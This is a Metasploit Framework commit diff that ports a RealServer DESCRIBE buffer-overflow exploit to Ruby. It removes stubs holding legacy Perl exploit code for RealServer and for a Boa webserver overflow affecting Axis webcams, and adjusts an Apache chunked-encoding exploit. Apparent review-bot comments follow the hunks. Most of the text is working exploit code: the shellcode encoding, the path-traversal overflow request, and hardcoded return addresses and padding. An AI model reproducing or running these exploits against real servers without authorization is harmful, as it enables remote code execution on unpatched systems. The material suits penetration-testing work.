ported realserver describe exploit
git-svn-id: file:///home/svn/framework3/trunk@4018 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
abf2e057c8
commit
7f981714a6
|
@ -1,256 +0,0 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'BOA cgi_env_add Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits an undisclosed flaw in the Boa
|
||||
webserver. The latest release branch is not vulnerable to
|
||||
this flaw, however, there are a number of embedded devices
|
||||
that still use this vulnerable version, such as Axis
|
||||
webcams. This exploit is pretty unreliable due to the
|
||||
unpredictability of certain variables that influence the
|
||||
env_buffer's, such as PATH, hostname, and other such things.
|
||||
|
||||
},
|
||||
'Author' => [ 'skape', 'thief <thief@hick.org>' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 140,
|
||||
'BadChars' => "\x00\x0a\x0d",
|
||||
'PrependEncoder' => "\x83\xec\x7f",
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Automatic Targetting',
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Ret' => 0x0,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => '',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::boa_cgi_env_add;
|
||||
|
||||
use strict;
|
||||
use base "Msf::Exploit";
|
||||
use Pex::Text;
|
||||
|
||||
my $advanced =
|
||||
{
|
||||
};
|
||||
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'BOA cgi_env_add Overflow',
|
||||
'Version' => '$Revision$',
|
||||
'Authors' =>
|
||||
[
|
||||
'skape <mmiller [at] hick.org>',
|
||||
'thief <thief [at] hick.org>'
|
||||
],
|
||||
'Description' =>
|
||||
Pex::Text::Freeform(qq{
|
||||
This module exploits an undisclosed flaw in the Boa webserver. The latest
|
||||
release branch is not vulnerable to this flaw, however, there are a number
|
||||
of embedded devices that still use this vulnerable version, such as Axis webcams.
|
||||
This exploit is pretty unreliable due to the unpredictability of certain variables
|
||||
that influence the env_buffer's, such as PATH, hostname, and other such things.
|
||||
}),
|
||||
'Arch' => [ 'x86' ],
|
||||
'OS' => [ 'linux' ],
|
||||
'Priv' => 0,
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [ 1, 'ADDR', 'The target proxy server address' ],
|
||||
'RPORT' => [ 1, 'PORT', 'The target proxy server port' ],
|
||||
'CGI' => [ 1, 'DATA', 'The CGI path to use', '/cgi-bin/io/virtualinput.cgi' ],
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 140,
|
||||
'MaxNops' => 0,
|
||||
'BadChars' => "\x00\x0a\x0d",
|
||||
'Keys' => [ '+findsock' ],
|
||||
'PrependEncoder' => "\x83\xec\x7f", # sub $0x7f, %esp
|
||||
},
|
||||
'Refs' =>
|
||||
[
|
||||
# 0day!
|
||||
],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Boa/0.92o (Linux)', 0xbffffc30, 0xbffffba0 ],
|
||||
[ 'Test', 0x41414141, 0x41414141 ],
|
||||
],
|
||||
'Keys' => [ 'boa' ],
|
||||
};
|
||||
|
||||
sub new
|
||||
{
|
||||
my $class = shift;
|
||||
my $self;
|
||||
|
||||
$self = $class->SUPER::new(
|
||||
{
|
||||
'Info' => $info,
|
||||
'Advanced' => $advanced,
|
||||
},
|
||||
@_);
|
||||
|
||||
return $self;
|
||||
}
|
||||
|
||||
sub Check
|
||||
{
|
||||
my $self = shift;
|
||||
my $code = "Safe";
|
||||
my $resp;
|
||||
my $s;
|
||||
|
||||
$s = Msf::Socket::Tcp->new(
|
||||
'PeerAddr' => $self->GetVar('RHOST'),
|
||||
'PeerPort' => $self->GetVar('RPORT'),
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => $self->GetVar('SSL'));
|
||||
|
||||
if (not defined($s))
|
||||
{
|
||||
return $self->CheckCode('Connect');
|
||||
}
|
||||
|
||||
$s->Send("HEAD / HTTP/1.0\r\n\r\n");
|
||||
|
||||
while (defined($resp = $s->Recv(-1, 5)))
|
||||
{
|
||||
my @lines = split /\n/, $resp;
|
||||
|
||||
foreach my $line (@lines)
|
||||
{
|
||||
my ($var, $val) = split /: /, $line;
|
||||
|
||||
$val =~ s/\r//;
|
||||
$val =~ s/\n//;
|
||||
|
||||
if ($var eq 'Server')
|
||||
{
|
||||
$code = "Appears" if ($val eq 'Boa/0.92o');
|
||||
}
|
||||
}
|
||||
|
||||
last if ($resp =~ "\r\n\r\n" or length($resp) == 0);
|
||||
}
|
||||
|
||||
$s->Close();
|
||||
|
||||
if ($code eq 'Appears')
|
||||
{
|
||||
$self->PrintLine("[*] This host appears to be vulnerable.");
|
||||
}
|
||||
else
|
||||
{
|
||||
$self->PrintLine("[*] This host does not appear to be vulnerable.");
|
||||
}
|
||||
|
||||
return $self->CheckCode($code);
|
||||
}
|
||||
|
||||
sub Exploit
|
||||
{
|
||||
my $self = shift;
|
||||
my $targetIdx = $self->GetVar('TARGET');
|
||||
my $payload = $self->GetVar('EncodedPayload');
|
||||
my $shellcode = $payload->Payload;
|
||||
my $randomText = undef;
|
||||
my $request = undef;
|
||||
my $target = $self->Targets->[$targetIdx];
|
||||
my $chunk = undef;
|
||||
my $final = undef;
|
||||
my $null = $target->[2];
|
||||
my $ret = $target->[1];
|
||||
my $cgi = $self->GetVar('CGI');
|
||||
my $pad = undef;
|
||||
my $s = undef;
|
||||
|
||||
$self->PrintLine('[*] Trying exploit target: ' . $target->[0]);
|
||||
|
||||
# Build out the request
|
||||
$randomText = Pex::Text::AlphaNumText(2039);
|
||||
$pad = ($ret - $null - 0xb) - length($shellcode);
|
||||
$chunk = "A" x 1858 . pack("V", $null - 0x74f);
|
||||
$final = $self->MakeNops($pad) . $shellcode . pack("V", $ret - length($shellcode));
|
||||
|
||||
$request =
|
||||
"GET $cgi HTTP/1.0\r\n" .
|
||||
"01: $randomText\r\n" .
|
||||
"02: $randomText\r\n" .
|
||||
"03: $randomText\r\n" .
|
||||
"04: $randomText\r\n" .
|
||||
"05: $randomText\r\n" .
|
||||
"06: $randomText\r\n" .
|
||||
"07: $randomText\r\n" .
|
||||
"08: $chunk\r\n" .
|
||||
"OWNED: $final\r\n" .
|
||||
"\r\n";
|
||||
|
||||
# Connect
|
||||
$s = Msf::Socket::Tcp->new(
|
||||
'PeerAddr' => $self->GetVar('RHOST'),
|
||||
'PeerPort' => $self->GetVar('RPORT'),
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => $self->GetVar('SSL'));
|
||||
|
||||
if (not defined($s) or
|
||||
$s->IsError)
|
||||
{
|
||||
$self->PrintLine('Error creating socket: '.$s->GetError);
|
||||
return;
|
||||
}
|
||||
|
||||
$s->Send($request);
|
||||
|
||||
$self->Handler($s) if (defined($s));
|
||||
}
|
||||
|
||||
|
||||
1;
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
|
|
@ -1,195 +0,0 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'RealServer Describe Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in RealServer 7/8/9
|
||||
and was based on Johnny Cyberpunk's THCrealbad exploit. This
|
||||
code should reliably exploit Linux, BSD, and Windows-based
|
||||
servers.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '4468'],
|
||||
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html'],
|
||||
[ 'MIL', '51'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2000,
|
||||
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d",
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Automatic Targetting',
|
||||
{
|
||||
'Platform' => 'linux, bsd, win32',
|
||||
'Ret' => 0x0,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Dec 20 2002',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::realserver_describe_linux;
|
||||
use base 'Msf::Exploit';
|
||||
use strict;
|
||||
use Pex::Text;
|
||||
|
||||
my $advanced = { };
|
||||
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'RealServer Describe Buffer Overflow',
|
||||
'Version' => '$Revision$',
|
||||
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
|
||||
|
||||
'Arch' => [ 'x86' ],
|
||||
'OS' => [ 'linux', 'bsd', 'win32' ],
|
||||
'Priv' => 1,
|
||||
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
||||
'RPORT' => [1, 'PORT', 'The RTSP port', 554],
|
||||
},
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2000,
|
||||
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff :&?.=",
|
||||
'Keys' => ['+findsock'],
|
||||
|
||||
},
|
||||
|
||||
'Description' => Pex::Text::Freeform(qq{
|
||||
This module exploits a buffer overflow in RealServer 7/8/9 and was based
|
||||
on Johnny Cyberpunk's THCrealbad exploit. This code should reliably exploit
|
||||
Linux, BSD, and Windows-based servers.
|
||||
}),
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
['OSVDB', '4468'],
|
||||
['URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html'],
|
||||
['MIL', '51'],
|
||||
],
|
||||
|
||||
'DefaultTarget' => 0,
|
||||
'Targets' => [['Universal Target']],
|
||||
|
||||
'Keys' => ['realserver'],
|
||||
|
||||
'DisclosureDate' => 'Dec 20 2002',
|
||||
};
|
||||
|
||||
sub new {
|
||||
my $class = shift;
|
||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
||||
return($self);
|
||||
}
|
||||
|
||||
sub Check {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
|
||||
my $s = Msf::Socket::Tcp->new
|
||||
(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => $self->GetVar('SSL'),
|
||||
);
|
||||
if ($s->IsError) {
|
||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
||||
return $self->CheckCode('Connect');
|
||||
}
|
||||
|
||||
$s->Send("OPTIONS / RTSP/1.0\r\n\r\n");
|
||||
|
||||
my $res = $s->Recv(-1, 5);
|
||||
$s->Close();
|
||||
|
||||
if ($res =~ m/^Server:([^\n]+)/sm)
|
||||
{
|
||||
my $svr = $1;
|
||||
$svr =~ s/(^\s+|\r|\s+$)//g;
|
||||
$self->PrintLine("[*] $svr");
|
||||
return $self->CheckCode('Detected');
|
||||
}
|
||||
return $self->CheckCode('Safe');
|
||||
}
|
||||
|
||||
sub Exploit {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
|
||||
|
||||
$self->PrintLine("[*] RealServer universal exploit launched against $target_host");
|
||||
$self->PrintLine("[*] Kill the master rmserver pid to prevent shell disconnect");
|
||||
|
||||
my $encoded;
|
||||
foreach (split(//, $shellcode)){ $encoded .= sprintf("%%%.2x", ord($_)) }
|
||||
|
||||
my $req = "DESCRIBE /". ("../" x 560) . "\xcc\xcc\x90\x90". $encoded. ".smi RTSP/1.0\r\n\r\n";
|
||||
|
||||
my $s = Msf::Socket::Tcp->new
|
||||
(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => $self->GetVar('SSL'),
|
||||
);
|
||||
if ($s->IsError) {
|
||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
||||
return;
|
||||
}
|
||||
|
||||
$s->Send($req);
|
||||
|
||||
$self->Handler($s);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
1;
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
|
|
@ -0,0 +1,78 @@
|
|||
require 'msf/core'
|
||||
require 'msf/core/exploit/http'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Multi::Realserver::Describe < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'RealServer Describe Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in RealServer 7/8/9
|
||||
and was based on Johnny Cyberpunk's THCrealbad exploit. This
|
||||
code should reliably exploit Linux, BSD, and Windows-based
|
||||
servers.
|
||||
},
|
||||
'Author' => 'hdm',
|
||||
'Version' => '$Revision: 3110 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '4468'],
|
||||
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html'],
|
||||
[ 'MIL', '51'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2000,
|
||||
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d",
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Universal',
|
||||
{
|
||||
'Platform' => [ 'linux', 'bsd', 'win' ]
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Dec 20 2002',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def check
|
||||
response = request(
|
||||
'method' => 'OPTIONS',
|
||||
'proto' => 'RTSP/1.0',
|
||||
'uri' => '/')
|
||||
|
||||
if response and response['Server']
|
||||
print_status("Found RTSP: #{response['Server']}")
|
||||
return Exploit::CheckCode::Detected
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("RealServer universal exploit launched against #{rhost}")
|
||||
print_status("Kill the master rmserver pid to prevent shell disconnect")
|
||||
|
||||
encoded = payload.encoded.gsub(/./) { |char| "%%%.2x" % char[0] }
|
||||
|
||||
request(
|
||||
'method' => 'DESCRIBE',
|
||||
'proto' => 'RTSP/1.0',
|
||||
'uri' => "/" + ("../" * 560) + "\xcc\xcc\x90\x90" + encoded + ".smi")
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
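Review bot: The ported `check` drops the connection-failure path the removed Perl version had (`return $self->CheckCode('Connect')`): if `request` raises when the RTSP port is closed or unreachable, `check` propagates the exception instead of returning a CheckCode, and any response that carries a `Server` header at all, not only a RealServer banner, is reported as Detected. Wrapping the call in `begin ... rescue ::Exception => e` with `print_status("Request failed: #{e}")` and `return Exploit::CheckCode::Safe` keeps the check's contract, assuming `request` raises here rather than returning nil; if it returns nil the existing `if response and ...` branch already covers it. Separately, `'Version' => '$Revision: 3110 $'` carries a stale expanded keyword where the files this commit removes used the bare `'$Revision$'` form; unless svn:keywords rewrites it on commit, the number stays wrong.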
|
|
@ -148,7 +148,7 @@ class Exploits::Windows::Http::ApacheChunkedEncoding < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
response = request(:uri => '/')
|
||||
response = request('uri' => '/')
|
||||
|
||||
if response.nil?
|
||||
print_status("No response to request")
|
||||
|
@ -229,14 +229,14 @@ class Exploits::Windows::Http::ApacheChunkedEncoding < Msf::Exploit::Remote
|
|||
|
||||
# Build the request
|
||||
request(
|
||||
:uri => '/',
|
||||
:headers =>
|
||||
'uri' => '/',
|
||||
'headers' =>
|
||||
{
|
||||
'Host' => "#{vhost}:#{rport}",
|
||||
'Transfer-Encoding' => "CHUNKED"
|
||||
},
|
||||
:body => "FFFFFFF0 " + pattern,
|
||||
:timeout => 2
|
||||
'body' => "FFFFFFF0 " + pattern,
|
||||
'timeout' => 2
|
||||
)
|
||||
|
||||
# Check the handler
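Review bot: Switching `request` to string-keyed options (`'uri'`, `'headers'`, `'body'`, `'timeout'`) means a call site still passing the old symbol keys would most likely be ignored silently rather than rejected, so the remaining `request(` calls in this file should be checked, and a one-line comment at the call site such as `# request options are string-keyed; symbol keys are not recognized` would guard against regressions. The same migration appears in both hunks of this file, and both enclosing methods (`check` and `exploit`) start and end outside the hunks.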
|
||||
|
|